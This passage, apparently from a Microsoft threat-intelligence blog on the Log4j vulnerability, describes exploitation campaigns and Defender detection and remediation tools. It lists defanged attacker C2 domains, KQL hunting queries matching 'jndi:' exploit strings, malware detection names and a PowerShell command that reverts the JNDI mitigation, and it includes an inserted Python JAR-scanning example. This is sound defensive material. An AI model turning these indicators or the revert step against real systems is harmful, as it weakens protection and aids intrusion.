In the HabitsRAT case, the campaign was seen overlapping with infrastructure used in prior campaigns.\n\n### Webtoos\n\nThe Webtoos malware has DDoS capabilities and persistence mechanisms that could allow an attacker to perform additional activities. As reported by [RiskIQ](<https://community.riskiq.com/article/67ba1386>), Microsoft has seen Webtoos being deployed via the vulnerability. Attackers\u2019 use of this malware or intent is not known at this time, but the campaign and infrastructure have been in use and have been targeting both Linux and Windows systems prior to this vulnerability.\n\n### A note on testing services and assumed benign activity\n\nWhile services such as _interact.sh_, _canarytokens.org_, _burpsuite_, and _dnslog.cn_ may be used by IT organizations to profile their own threat footprints, Microsoft encourages including these services in your hunting queries and validating observations of these in environments to ensure they are intentional and legitimate activity.\n\n### Exploitation in internet-facing systems leads to ransomware\n\nAs early as January 4, attackers started exploiting the CVE-2021-44228 vulnerability in internet-facing systems running VMware Horizon. Our investigation shows that successful intrusions in these campaigns led to the deployment of the NightSky ransomware.\n\nThese attacks are performed by a China-based ransomware operator that we\u2019re tracking as DEV-0401. DEV-0401 has previously deployed multiple ransomware families including LockFile, AtomSilo, and Rook, and has similarly exploited Internet-facing systems running Confluence (CVE-2021-26084) and on-premises Exchange servers (CVE-2021-34473).\n\nBased on our analysis, the attackers are using command and control (CnC) servers that spoof legitimate domains. 
These include service[.]trendmrcio[.]com, api[.]rogerscorp[.]org, api[.]sophosantivirus[.]ga, apicon[.]nvidialab[.]us, w2zmii7kjb81pfj0ped16kg8szyvmk.burpcollaborator[.]net, and 139[.]180[.]217[.]203.\n\n### Attackers propagating Log4j attacks via previously undisclosed vulnerability\n\nDuring our sustained monitoring of threats taking advantage of the Log4j 2 vulnerabilities, we observed activity related to attacks being propagated via a previously undisclosed vulnerability in the SolarWinds Serv-U software. We discovered that the vulnerability, now tracked as [CVE-2021-35247](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-35247>), is an input validation vulnerability that could allow attackers to build a query given some input and send that query over the network without sanitation.\n\nWe reported our discovery to SolarWinds, and we\u2019d like to thank their teams for immediately investigating and working to remediate the vulnerability. We strongly recommend affected customers to apply security updates released by referring to the SolarWinds advisory here: <https://www.solarwinds.com/trust-center/security-advisories/cve-2021-35247>. \n\nMicrosoft customers can use threat and vulnerability management in Microsoft Defender for Endpoint to identify and remediate devices that have this vulnerability. 
In addition, Microsoft Defender Antivirus and Microsoft Defender for Endpoint detect malicious behavior related to the observed activity.\n\n## Finding and remediating vulnerable apps and systems\n\n### Threat and vulnerability management\n\n[Threat and vulnerability management](<https://www.microsoft.com/security/business/threat-protection/threat-vulnerability-management>) capabilities in Microsoft Defender for Endpoint monitor an organization\u2019s overall security posture and equip customers with real-time insights into organizational risk through continuous vulnerability discovery, intelligent prioritization, and the ability to seamlessly remediate vulnerabilities.\n\n#### Discovering affected components, software, and devices via a unified Log4j dashboard\n\nThreat and vulnerability management automatically and seamlessly identifies devices affected by the Log4j vulnerabilities and the associated risk in the environment and significantly reduces time-to-mitigate.\n\nThe wide use of Log4j across many supplier\u2019s products challenge defender teams to mitigate and address the risks posed by the vulnerabilities ([CVE-2021-44228](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228>) or [CVE-2021-45046](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45046>)). The threat and vulnerability management capabilities within Microsoft 365 Defender can help identify vulnerable installations. On December 15, we began rolling out updates to provide a consolidated view of the organizational exposure to the Log4j 2 vulnerabilities\u2014on the device, software, and vulnerable component level\u2014through a range of automated, complementing capabilities. These capabilities are supported on Windows 10, Windows 11, and Windows Server 2008, 2012, and 2016. They are also supported on Linux, but they require updating the Microsoft Defender for Endpoint Linux client to version 101.52.57 (30.121092.15257.0) or later. 
The updates include the following:\n\n * Discovery of vulnerable Log4j library components (paths) on devices\n * Discovery of vulnerable installed applications that contain the Log4j library on devices\n * A [dedicated Log4j dashboard](<https://security.microsoft.com/vulnerabilities/vulnerability/CVE-2021-44228/overview>) that provides a consolidated view of various findings across vulnerable devices, vulnerable software, and vulnerable files\n * Introduction of a new schema in advanced hunting, **DeviceTvmSoftwareEvidenceBeta**, which surfaces file-level findings from the disk and provides the ability to correlate them with additional context in advanced hunting:\n \n \n DeviceTvmSoftwareEvidenceBeta\n | mv-expand DiskPaths\n | where DiskPaths contains \"log4j\"\n | project DeviceId, SoftwareName, SoftwareVendor, SoftwareVersion, DiskPaths\n\nTo complement this new table, the existing **DeviceTvmSoftwareVulnerabilities** table in advanced hunting can be used to identify vulnerabilities in installed software on devices:\n \n \n DeviceTvmSoftwareVulnerabilities \n | where CveId in (\"CVE-2021-44228\", \"CVE-2021-45046\")\n\nThese new capabilities integrate with the existing threat and vulnerability management experience and are gradually rolling out. As of December 27, 2021, discovery is based on installed application CPEs that are known to be vulnerable to Log4j RCE, as well as the presence of vulnerable Log4j Java Archive (JAR) files. Cases where Log4j is packaged into an Uber-JAR or shaded are currently not discoverable, but support for discovery of these instances and other packaging methods is in development. Support for macOS is also in progress and will roll out soon.\n\n\n\n_Figure 1. 
Threat and Vulnerability recommendation __\u201cAttention required: Devices found with vulnerable Apache Log4j versions\u201d_\n\nOn the Microsoft 365 Defender portal, go to **Vulnerability management** > **Dashboard** > **Threat awareness**, then click **View vulnerability details** to see the consolidated view of organizational exposure to the Log4j 2 vulnerability (for example, CVE-2021-44228 dashboard, as shown in the following screenshots) on the device, software, and vulnerable component level.\n\n\n\n_Figure 2. Threat and vulnerability management dedicated CVE-2021-44228 dashboard_\n\n\n\n_Figure 3. Threat and vulnerability management finds exposed paths_\n\n\n\n_Figure 4. Threat and vulnerability management finds exposed devices based on vulnerable software and vulnerable files detected on disk_\n\nNote: Scan results may take some time to reach full coverage, and the number of discovered devices may be low at first but will grow as the scan reaches more devices. A regularly updated list of vulnerable products can be viewed in the Microsoft 365 Defender portal with matching recommendations. We will continue to review and update this list as new information becomes available.\n\nThrough [device discovery](<https://techcommunity.microsoft.com/t5/microsoft-defender-for-endpoint/unmanaged-device-protection-capabilities-are-now-generally/ba-p/2463796>), unmanaged devices with products and services affected by the vulnerabilities are also surfaced so they can be onboarded and secured.\n\n\n\n_Figure 5. Finding vulnerable applications and devices via software inventory_\n\n#### Applying mitigation directly in the Microsoft 365 Defender portal\n\nWe have released two new threat and vulnerability management capabilities that can significantly simplify the process of turning off JNDI lookup, a workaround that can prevent the exploitation of the Log4j vulnerabilities on most devices, using an environment variable called LOG4J_FORMAT_MSG_NO_LOOKUPS. 
These new capabilities provide security teams with the following:

 1. View the mitigation status for each affected device. This can help prioritize mitigation and/or patching of devices based on their mitigation status.

To use this feature, open the [Exposed devices tab](<https://security.microsoft.com/vulnerabilities/vulnerability/CVE-2021-44228/exposedDevices>) in the dedicated CVE-2021-44228 dashboard and review the **Mitigation status** column. Note that it may take a few hours for the updated mitigation status of a device to be reflected.

_Figure 6. Viewing each device’s mitigation status_

 2. Apply the mitigation (that is, turn off JNDI lookup) on devices directly from the portal. This feature is currently available for Windows devices only.

The mitigation will be applied directly via the Microsoft Defender for Endpoint client. To view the mitigation options, click on the **Mitigation options** button in the [Log4j dashboard](<https://security.microsoft.com/vulnerabilities/vulnerability/CVE-2021-44228/overview>):

You can choose to apply the mitigation to all exposed devices or select specific devices for which you would like to apply it. To complete the process and apply the mitigation on devices, click **Create mitigation action**.

_Figure 7. Creating mitigation actions for exposed devices._

In cases where the mitigation needs to be reverted, follow these steps:

 1. Open an elevated PowerShell window
 2. Run the following command:

    [Environment]::SetEnvironmentVariable("LOG4J_FORMAT_MSG_NO_LOOKUPS", $null, [EnvironmentVariableTarget]::Machine)

The change will take effect after the device restarts.

### Microsoft 365 Defender advanced hunting

Advanced hunting can also surface affected software. This query looks for possibly vulnerable applications using the affected Log4j component.
Triage the results to determine applications and programs that may need to be patched and updated.

    DeviceTvmSoftwareInventory
    | where SoftwareName contains "log4j"
    | project DeviceName, SoftwareName, SoftwareVersion

_Figure 8. Finding vulnerable software via advanced hunting_

### Microsoft Defender for Cloud

#### Microsoft Defender for servers

Organizations using Microsoft Defender for Cloud can use [Inventory tools](<https://docs.microsoft.com/azure/defender-for-cloud/asset-inventory>) to begin investigations before there’s a CVE number. With Inventory tools, there are two ways to determine exposure across hybrid and multi-cloud resources:

 * Vulnerability assessment findings – Organizations that have enabled any of the vulnerability assessment tools (whether it's Microsoft Defender for Endpoint's [threat and vulnerability management](<https://docs.microsoft.com/azure/defender-for-cloud/deploy-vulnerability-assessment-tvm>) module, the [built-in Qualys scanner](<https://docs.microsoft.com/azure/defender-for-cloud/deploy-vulnerability-assessment-vm>), or a [bring your own license solution](<https://docs.microsoft.com/azure/defender-for-cloud/deploy-vulnerability-assessment-byol-vm>)) can search by CVE identifier:

_Figure 9. Searching vulnerability assessment findings by CVE identifier_

 * Software inventory – With the combined [integration with Microsoft Defender for Endpoint](<https://docs.microsoft.com/azure/defender-for-cloud/integration-defender-for-endpoint>) and [Microsoft Defender for servers](<https://docs.microsoft.com/azure/defender-for-cloud/defender-for-servers-introduction>), organizations can search for resources by installed applications and discover resources running the vulnerable software:

_Figure 10. Searching software inventory by installed applications_

Note that this doesn’t replace a search of your codebase.
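One way to perform that codebase and artifact search, as an added example (not code from the original post or from any Microsoft product): a Python scanner that looks inside JAR files for `JndiLookup.class`, the class that makes JNDI lookups possible, reports the log4j-core version declared in the archive's Maven `pom.properties` when one is present, and descends one level into nested JARs, the same nesting limit the page gives for Defender for Containers. Matching the class by path suffix rather than by exact path also catches shaded (relocated) copies, which the page says the inventory cannot yet discover. The sample Uber-JAR is constructed in memory with placeholder contents; its structure (a shaded copy at the top level, a plain log4j-core one level down, and another two levels down) is an assumption chosen to exercise each case.

```python
import io
import zipfile
from typing import Dict, List, Optional

# Marker entries inside a log4j-core JAR. The class is what enables JNDI lookups; the Maven
# pom.properties carries the declared version. Suffix matching tolerates package relocation.
JNDI_LOOKUP_SUFFIX = "/lookup/JndiLookup.class"
POM_PROPERTIES_SUFFIX = "/log4j-core/pom.properties"
MAX_NESTING = 1  # one level of nested JARs, the limit the page states for Defender for Containers


def _declared_version(zf: zipfile.ZipFile, names: List[str]) -> Optional[str]:
    """Read version= from the log4j-core pom.properties if the archive carries one."""
    for name in names:
        if name.endswith(POM_PROPERTIES_SUFFIX):
            for line in zf.read(name).decode("utf-8", "replace").splitlines():
                if line.startswith("version="):
                    return line.split("=", 1)[1].strip()
    return None


def scan_jar(data: bytes, label: str = "archive.jar", depth: int = 0) -> List[Dict]:
    """Return one finding per archive (outer or nested) that contains JndiLookup.class."""
    findings: List[Dict] = []
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return findings  # a .jar entry that is not a valid zip: nothing to inspect
    with zf:
        names = zf.namelist()
        jndi_entries = [n for n in names if n.endswith(JNDI_LOOKUP_SUFFIX)]
        if jndi_entries:
            findings.append({
                "archive": label,
                "class_path": jndi_entries[0],
                "version": _declared_version(zf, names),
                "nesting": depth,
            })
        if depth < MAX_NESTING:
            for name in names:
                if name.lower().endswith((".jar", ".war", ".ear")):
                    findings.extend(scan_jar(zf.read(name), f"{label}!/{name}", depth + 1))
    return findings


def _build_jar(entries: Dict[str, bytes]) -> bytes:
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for path, content in entries.items():
            zf.writestr(path, content)
    return buf.getvalue()


def build_sample_app_jar() -> bytes:
    """Constructed sample input (not a real application): an Uber-JAR with a relocated (shaded)
    JndiLookup at the top level, a plain log4j-core 2.14.1 one level down, and a second
    log4j-core two levels down, which is beyond the one-level nesting limit."""
    stub_class = b"\xca\xfe\xba\xbe"  # class-file magic only; the content is irrelevant to the scan
    log4j_core = _build_jar({
        "org/apache/logging/log4j/core/lookup/JndiLookup.class": stub_class,
        "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties":
            b"version=2.14.1\ngroupId=org.apache.logging.log4j\nartifactId=log4j-core\n",
    })
    wrapper = _build_jar({"lib/log4j-core-2.14.1.jar": log4j_core})  # nesting depth 2 when embedded
    return _build_jar({
        "com/example/App.class": stub_class,
        "com/example/shaded/org/apache/logging/log4j/core/lookup/JndiLookup.class": stub_class,
        "BOOT-INF/lib/log4j-core-2.14.1.jar": log4j_core,
        "lib/wrapper.jar": wrapper,
    })


if __name__ == "__main__":
    for f in scan_jar(build_sample_app_jar(), "app.jar"):
        print(f"{f['archive']}: {f['class_path']} "
              f"(version {f['version'] or 'unknown'}, nesting {f['nesting']})")
```

A hit only says the archive carries the lookup class; whether it is exploitable depends on the declared version and the runtime configuration, so treat findings as triage input alongside the inventory results rather than as a verdict. The copy two levels down is deliberately missed, which is the kind of gap the one-level nesting limit leaves.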
It’s possible that software with integrated Log4j libraries won’t appear in the software inventory results, but the inventory is helpful in the initial triage of investigations related to this incident. For more information about how Microsoft Defender for Cloud finds machines affected by CVE-2021-44228, read this [tech community post](<https://techcommunity.microsoft.com/t5/microsoft-defender-for-cloud/how-defender-for-cloud-finds-machines-affected-by-log4j/ba-p/3037271>).

#### Microsoft Defender for Containers

Microsoft Defender for Containers is capable of discovering images affected by the vulnerabilities recently discovered in Log4j 2: [CVE-2021-44228](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228>), [CVE-2021-45046](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45046>), and [CVE-2021-45105](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45105>). Images are automatically scanned for vulnerabilities in three different use cases: when pushed to an Azure container registry, when pulled from an Azure container registry, and when container images are running on a Kubernetes cluster. Additional information on supported scan triggers and Kubernetes clusters can be found [here](<https://docs.microsoft.com/azure/defender-for-cloud/defender-for-containers-introduction?tabs=defender-for-container-arch-aks>).

Log4j binaries are discovered whether they are deployed via a package manager, copied to the image as stand-alone binaries, or included within a JAR archive (up to one level of nesting).

We will continue to follow up on any additional developments and will update our detection capabilities if any additional vulnerabilities are reported.

**Finding affected images**

To find vulnerable images across registries using the Azure portal, navigate to the **Microsoft Defender for Cloud** service in the Azure portal.
Open the **Container Registry images should have vulnerability findings resolved** recommendation and search findings for the relevant CVEs.

_Figure 11. Finding images with the CVE-2021-45046 vulnerability_

**Find vulnerable running images on Azure portal [preview]**

To view only vulnerable images that are currently running on a Kubernetes cluster using the Azure portal, navigate to the **Microsoft Defender for Cloud** service in the Azure portal. Open the **Vulnerabilities in running container images should be remediated (powered by Qualys)** recommendation and search findings for the relevant CVEs:

_Figure 12. Finding running images with the CVE-2021-45046 vulnerability_

Note: This recommendation requires clusters to run the Microsoft Defender security profile to provide visibility on running images.

**Search Azure Resource Graph data**

Azure Resource Graph (ARG) provides instant access to resource information across cloud environments with robust filtering, grouping, and sorting capabilities. It's a quick and efficient way to query information across Azure subscriptions programmatically or from within the Azure portal. ARG provides another way to query resource data for resources found to be affected by the Log4j vulnerability.

The following query finds resources affected by the Log4j vulnerability across subscriptions.
Use the additional data field across all returned results to obtain details on vulnerable resources:

    securityresources
    | where type =~ "microsoft.security/assessments/subassessments"
    | extend assessmentKey=extract(@"(?i)providers/Microsoft.Security/assessments/([^/]*)", 1, id), subAssessmentId=tostring(properties.id), parentResourceId=extract("(.+)/providers/Microsoft.Security", 1, id)
    | extend Props = parse_json(properties)
    | extend additionalData = Props.additionalData
    | extend cves = additionalData.cve
    | where isnotempty(cves) and array_length(cves) > 0
    | mv-expand cves
    | where tostring(cves) has "CVE-2021-44228" or tostring(cves) has "CVE-2021-45046" or tostring(cves) has "CVE-2021-45105"

### Microsoft Sentinel queries

Microsoft Sentinel customers can use the following detection query to look for devices that have applications with the vulnerability:

 * [Vulnerable machines related to Log4j CVE-2021-44228](<https://github.com/Azure/Azure-Sentinel/blob/master/Detections/SecurityNestedRecommendation/Log4jVulnerableMachines.yaml>)

This query uses the Microsoft Defender for Cloud nested recommendations data to find machines vulnerable to Log4j CVE-2021-44228.

Microsoft Sentinel also provides a CVE-2021-44228 Log4Shell Research Lab Environment for testing the vulnerability: <https://github.com/OTRF/Microsoft-Sentinel2Go/tree/master/grocery-list/Linux/demos/CVE-2021-44228-Log4Shell>

### RiskIQ EASM and Threat Intelligence

RiskIQ has published a few threat intelligence articles on this CVE, with mitigation guidance and IOCs. The latest one with links to previous articles can be found [here](<https://community.riskiq.com/article/67ba1386>). Both Community users and enterprise customers can search within the threat intelligence portal for data about potentially vulnerable components exposed to the Internet.
For example, it's possible to [surface all observed instances of Apache](<https://community.riskiq.com/search/components?category=Server&query=Apache>) or [Java](<https://community.riskiq.com/research?query=java>), including specific versions. Leverage this method of exploration to aid in understanding the larger Internet exposure, while also filtering down to what may impact you.

For a more automated method, registered users can view their attack surface to understand tailored findings associated with their organization. Note, you must be registered with a corporate email and the automated attack surface will be limited. Digital Footprint customers can immediately understand what may be vulnerable and act swiftly and resolutely using the [Attack Surface Intelligence Dashboard](<https://app.riskiq.net/a/main/index#/dashboards/379/RiskIQ%20Attack%20Intelligence%20Dashboard>) Log4J Insights tab.

## Detecting and responding to exploitation attempts and other related attacker activity

### Microsoft 365 Defender

Microsoft 365 Defender coordinates multiple security solutions that detect components of observed attacks taking advantage of this vulnerability, from exploitation attempts to remote code execution and post-exploitation activity.

_Figure 13. Microsoft 365 Defender solutions protect against related threats_

Customers can click **Need help?** in the Microsoft 365 Defender portal to open up a search widget. Customers can key in “Log4j” to search for in-portal resources, check if their network is affected, and work on corresponding actionable items to mitigate them.

#### Microsoft Defender Antivirus

Turn on cloud-delivered protection in Microsoft Defender Antivirus to cover rapidly evolving attacker tools and techniques. Cloud-based machine learning protections block the majority of new and unknown variants.
Microsoft Defender Antivirus detects components and behaviors related to this threat as the following detection names:

On Windows:

 * [Trojan:Win32/Capfetox.AA](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Win32/Capfetox.AA&threatId=-2147159827>) - detects attempted exploitation on the attacker machine
 * [HackTool:Win32/Capfetox.A!dha](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=HackTool:Win32/Capfetox.A!dha&threatId=-2147159807>) - detects attempted exploitation on the attacker machine
 * [VirTool:Win64/CobaltStrike.A](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=VirTool:Win64/CobaltStrike.A&threatId=-2147200161>), [TrojanDropper:PowerShell/Cobacis.A](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=TrojanDropper:PowerShell/Cobacis.A&threatId=-2147200375>) - detects Cobalt Strike Beacon loaders
 * [TrojanDownloader:Win32/CoinMiner](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=TrojanDownloader:Win32/CoinMiner&threatId=-2147257370>) - detects post-exploitation coin miner
 * [Trojan:Win32/WebToos.A](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Win32/WebToos.A&threatId=-2147278986>) - detects post-exploitation PowerShell
 * [Ransom:MSIL/Khonsari.A](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Ransom:MSIL/Khonsari.A&threatId=-2147159485>) - detects a strain of the Khonsari ransomware family observed being distributed post-exploitation
 * [Trojan:Win64/DisguisedXMRigMiner](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Win64/DisguisedXMRigMiner&threatId=-2147169351>) - detects post-exploitation cryptocurrency miner
 * [TrojanDownloader:Java/Agent.S](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=TrojanDownloader:Java/Agent.S&threatId=-2147159796>) - detects suspicious class files used in post-exploitation
 * [TrojanDownloader:PowerShell/NitSky.A](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=TrojanDownloader:PowerShell/NitSky.A&threatId=-2147157401>) - detects attempts to download CobaltStrike Beacon payload

On Linux:

 * [Trojan:Linux/SuspectJavaExploit.A](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Linux/SuspectJavaExploit.A&threatId=-2147159829>), [Trojan:Linux/SuspectJavaExploit.B](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Linux/SuspectJavaExploit.B&threatId=-2147159828>), [Trojan:Linux/SuspectJavaExploit.C](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Linux/SuspectJavaExploit.C&threatId=-2147159808>) - blocks Java processes downloading and executing payload through output redirection
 * [Trojan:Linux/BashMiner.A](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Linux/BashMiner.A&threatId=-2147159832>) - detects post-exploitation cryptocurrency miner
 * [TrojanDownloader:Linux/CoinMiner](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=TrojanDownloader:Linux/CoinMiner&threatId=-2147241315>) - detects post-exploitation cryptocurrency miner
 * [TrojanDownloader:Linux/Tusnami](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=TrojanDownloader:Linux/Tusnami.A&threatId=-2147159794>) - detects post-exploitation Backdoor Tsunami downloader
 * [Backdoor:Linux/Tusnami.C](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Backdoor:Linux/Tusnami.C!MTB&threatId=-2147178887>) - detects post-exploitation Tsunami backdoor
 * [Backdoor:Linux/Setag.C](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Backdoor:Linux/Setag.C&threatId=-2147277056>) - detects post-exploitation Gates backdoor
 * [Exploit:Linux/CVE-2021-44228.A](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Exploit:Linux/CVE-2021-44228.A&threatId=-2147159804>), [Exploit:Linux/CVE-2021-44228.B](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Exploit:Linux/CVE-2021-44228.B&threatId=-2147159803>) - detects exploitation
 * [TrojanDownloader:Linux/Capfetox.A](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=TrojanDownloader:Linux/Capfetox.A&threatId=-2147159639>), [TrojanDownloader:Linux/Capfetox.B](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=TrojanDownloader:Linux/Capfetox.B&threatId=-2147159640>)
 * [TrojanDownloader:Linux/ShAgnt!MSR](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=TrojanDownloader:Linux/ShAgnt!MSR&threatId=-2147159432>), [TrojanDownloader:Linux/ShAgnt.A!MTB](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=TrojanDownloader:Linux/ShAgnt.A!MTB&threatId=-2147159607>)
 * [Trojan:Linux/Kinsing.L](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Linux/Kinsing.L&threatId=-2147189973>) - detects post-exploitation cryptocurrency Kinsing miner
 * [Trojan:Linux/Mirai.TS!MTB](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Linux/Mirai.TS!MTB&threatId=-2147159629>) - detects post-exploitation Mirai malware capable of performing DDoS
 * [Backdoor:Linux/Dakkatoni.az!MTB](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Backdoor:Linux/Dakkatoni.az!MTB&threatId=-2147205141>) - detects post-exploitation Dakkatoni backdoor trojan capable of downloading more payloads
 * [Trojan:Linux/JavaExploitRevShell.A](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Linux/JavaExploitRevShell.A&threatId=-2147159631>) - detects reverse shell attack post-exploitation
 * [Trojan:Linux/BashMiner.A](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Linux/BashMiner.A&threatId=-2147159832>), [Trojan:Linux/BashMiner.B](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Linux/BashMiner.B&threatId=-2147159820>) - detects post-exploitation cryptocurrency miner

#### Microsoft Defender for Endpoint

Users of Microsoft Defender for Endpoint can turn on the following attack surface reduction rule to block or audit some observed activity associated with this threat.

 * Block executable files from running unless they meet a prevalence, age, or trusted list criterion

Due to the broad network exploitation nature of vectors through which this vulnerability can be exploited and the fact that applying mitigations holistically across large environments will take time, we encourage defenders to look for signs of post-exploitation rather than fully relying on prevention. Observed post-exploitation activity such as coin mining, lateral movement, and Cobalt Strike is detected with behavior-based detections.

Alerts with the following titles in the Security Center indicate threat activity related to exploitation of the Log4j vulnerability on your network and should be immediately investigated and remediated.
These alerts are supported on both Windows and Linux platforms:

 * **Log4j exploitation detected** – detects known behaviors that attackers perform following successful exploitation of the CVE-2021-44228 vulnerability
 * **Log4j exploitation artifacts detected** (previously titled Possible exploitation of CVE-2021-44228) – detects coin miners, shells, backdoors, and payloads such as Cobalt Strike used by attackers post-exploitation
 * **Log4j exploitation network artifacts detected** (previously titled Network connection seen in CVE-2021-44228 exploitation) – detects network traffic connecting to an address associated with CVE-2021-44228 scanning or exploitation activity

The following alerts may indicate exploitation attempts or testing/scanning activity. Microsoft advises customers to investigate with caution, as these alerts don’t necessarily indicate successful exploitation:

 * **Possible target of Log4j exploitation** – detects a possible attempt to exploit the remote code execution vulnerability in the Log4j component of an Apache server in communication _received by_ this device
 * **Possible target of Log4j vulnerability scanning** – detects a possible _attempt to scan_ for the remote code execution vulnerability in a Log4j component of an Apache server in communication received by this device
 * **Possible source of Log4j exploitation** – detects a possible attempt to exploit the remote code execution vulnerability in the Log4j component of an Apache server in communication _initiated from_ this device
 * **Possible Log4j exploitation** – detects multiple behaviors, including suspicious command launch post-exploitation
 * **Possible Log4j exploitation (CVE-2021-44228)** – inactive; initially covered several of the above, now replaced with more specific titles

The following alerts detect activities that have been observed in attacks that utilize at least one of the Log4j vulnerabilities. However, these alerts can also indicate activity that is not related to the vulnerability. We are listing them here, as it is highly recommended that they are triaged and remediated immediately given their severity and the potential that they could be related to Log4j exploitation:

 * Suspicious remote PowerShell execution
 * Download of file associated with digital currency mining
 * Process associated with digital currency mining
 * Cobalt Strike command and control detected
 * Suspicious network traffic connection to C2 Server
 * Ongoing hands-on-keyboard attacker activity detected (Cobalt Strike)

Some of the alerts mentioned above utilize the enhanced network inspection capabilities in Microsoft Defender for Endpoint. These alerts correlate several network and endpoint signals into high-confidence detection of successful exploitation, as well as providing detailed evidence artifacts valuable for triage and investigation of detected activities.

_Figure 14. Example detection leveraging network inspection provides details about the Java class returned following successful exploitation_

#### Microsoft Defender for Cloud Apps (previously Microsoft Cloud App Security)

Microsoft 365 Defender detects exploitation patterns in different data sources, including cloud application traffic reported by Microsoft Defender for Cloud Apps. The following alert surfaces exploitation attempts via cloud applications that use vulnerable Log4j components:

 * Log4j exploitation attempt via cloud application (previously titled Exploitation attempt against Log4j (CVE-2021-44228))

_Figure 15. Microsoft 365 Defender alert "Exploitation attempt against Log4j (CVE-2021-44228)"_

#### Microsoft Defender for Office 365

To add a layer of protection against exploits that may be delivered via email, Microsoft Defender for Office 365 flags suspicious emails (e.g., emails with the “jndi” string in email headers or the sender email address field), which are moved to the Junk folder.

We also added the following new alert, which detects attempts to exploit CVE-2021-44228 through email headers:

 * Log4j exploitation attempt via email (previously titled Log4j Exploitation Attempt – Email Headers (CVE-2021-44228))

_Figure 16. Sample alert on malicious sender display name found in email correspondence_

This detection looks for exploitation attempts in email headers, such as the sender display name, sender, and recipient addresses. The alert covers known obfuscation attempts that have been observed in the wild. If this alert is surfaced, customers are recommended to evaluate the source address, email subject, and file attachments to get more context regarding the authenticity of the email.

_Figure 17. Sample email with malicious sender display name_

In addition, this email event can also be surfaced via advanced hunting:

_Figure 18. Sample email event surfaced via advanced hunting_

#### Microsoft 365 Defender advanced hunting queries

To locate possible exploitation activity, run the following queries:

**Possible malicious indicators in cloud application events**

This query is designed to flag exploitation attempts for cases where the attacker is sending the crafted exploitation string using vectors such as User-Agent, Application or Account name. The hits returned from this query are most likely unsuccessful attempts; however, the results can be useful to identify attackers’ details such as IP address, payload string, download URL, etc.
    CloudAppEvents
    | where Timestamp > datetime("2021-12-09")
    | where UserAgent contains "jndi:"
        or AccountDisplayName contains "jndi:"
        or Application contains "jndi:"
        or AdditionalFields contains "jndi:"
    | project ActionType, ActivityType, Application, AccountDisplayName, IPAddress, UserAgent, AdditionalFields

**Alerts related to Log4j vulnerability**

This query looks for alert activity pertaining to the Log4j vulnerability.

    AlertInfo
    | where Title in~('Suspicious script launched',
        'Exploitation attempt against Log4j (CVE-2021-44228)',
        'Suspicious process executed by a network service',
        'Possible target of Log4j exploitation (CVE-2021-44228)',
        'Possible target of Log4j exploitation',
        'Possible Log4j exploitation',
        'Network connection seen in CVE-2021-44228 exploitation',
        'Log4j exploitation detected',
        'Possible exploitation of CVE-2021-44228',
        'Possible target of Log4j vulnerability (CVE-2021-44228) scanning',
        'Possible source of Log4j exploitation',
        'Log4j exploitation attempt via cloud application', // Previously titled Exploitation attempt against Log4j
        'Log4j exploitation attempt via email' // Previously titled Log4j Exploitation Attempt
        )

**Devices with Log4j vulnerability alerts and additional other alert-related context**

This query surfaces devices with Log4j-related alerts and adds additional context from other alerts on the device.
    // Get any devices with Log4J related Alert Activity
    let DevicesLog4JAlerts = AlertInfo
    | where Title in~('Suspicious script launched',
        'Exploitation attempt against Log4j (CVE-2021-44228)',
        'Suspicious process executed by a network service',
        'Possible target of Log4j exploitation (CVE-2021-44228)',
        'Possible target of Log4j exploitation',
        'Possible Log4j exploitation',
        'Network connection seen in CVE-2021-44228 exploitation',
        'Log4j exploitation detected',
        'Possible exploitation of CVE-2021-44228',
        'Possible target of Log4j vulnerability (CVE-2021-44228) scanning',
